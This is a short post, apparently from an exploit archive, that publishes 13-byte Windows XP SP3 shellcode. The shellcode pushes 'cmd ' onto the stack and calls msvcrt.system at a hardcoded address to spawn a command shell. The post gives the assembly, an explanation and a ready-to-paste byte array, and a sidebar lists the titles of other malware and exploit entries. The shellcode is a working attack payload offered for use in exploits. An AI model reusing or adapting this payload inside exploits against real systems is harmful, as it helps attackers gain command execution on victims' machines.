win32/xp sp3 (Ru) cmd 13 bytes

Posted on 03 March 2010

==============================
win32/xp sp3 (Ru) cmd 13 bytes
==============================


Tested on Windows XP Pro Rus sp3. Probably, will work with any service pack present.
 
68 636D6420  push 0x20646D63
54           push esp
B8 C793C177  mov eax,msvcrt.system
FFD0         call eax
 
I push "cmd " in the stack, then push esp, which is address of pushed string. "cmd" has trailing space, 'cos I didn't want to use zero-byte, so this space transforms rubbish from stack in parameter for cmd. Unfortunately, once in a while it will crush cmd. Don't forget, that address of system( char * ) changes from one service pack to another.
 
Great thanks to Mountassif Moad for his inspiring shellcodes.
 
{ 0x68, 0x63, 0x6D, 0x64, 0x20, 0x54, 0xB8, 0xC7, 0x93, 0xC1, 0x77, 0xFF, 0xD0 }
 
Ñoded via lord Kelvin

# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20